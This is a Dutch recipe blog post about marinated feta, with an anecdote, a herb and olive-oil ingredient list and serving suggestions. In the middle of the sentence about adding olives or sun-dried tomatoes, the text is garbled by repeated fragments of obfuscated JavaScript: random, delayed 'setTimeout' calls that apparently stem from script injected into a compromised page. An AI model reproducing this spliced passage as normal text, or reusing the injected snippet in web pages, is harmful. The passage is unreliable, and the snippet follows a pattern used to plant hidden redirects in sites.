Dit eenvoudige feta hapje doet het echt op elk feestje goed! Ik heb dit hapje ooit een keer in een bruin cafe in Den Haag geproefd. Al proevende hebben we een beetje achterhaald wat er allemaal voor kruiden in zaten en helaas hadden we aan 1 bakje niet genoeg om het echt goed te proeven… wat vervelend! 😉
Voor deze gemarineerde feta heb je eigenlijk vooral heel veel kruiden nodig. Zelf maak ik altijd een mengsel in de hakmolen van de volgende kruiden en specerijen. Om de smaak er echt goed in te laten trekken kun je de feta het beste een paar uur marineren. Goed van te voren voor te bereiden dus als je een feestje hebt!
Wat heb je nodig?
– 1 bos basilicum
– 1 bos koriander
– 2 teentjes knoflook
– Goede extra vergine olijfolie
– zeezout
– Peper
– Korianderzaad
Je kunt om te variëren ook olijven of zongedroogde dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaten dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevoegen, deze combinatie is natuurlijk altijd goed!
Ook lekker bij…
Als je eenmaal wat gemarineerde feta hebt gemaakt kun je hier natuurlijk van alles mee doen. Heerlijk door couscous, pasta of door een salade heen. Het geeft het allemaal gelijk net even iets extra’s.
Heb jij ook een leuke variatietip? Deel deze dan op mijn facebook pagina of laat een berichtje achter onder deze blogpost.

Geen Reacties op "Gemarineerde Feta, wat een heerlijk eenvoudig hapje!"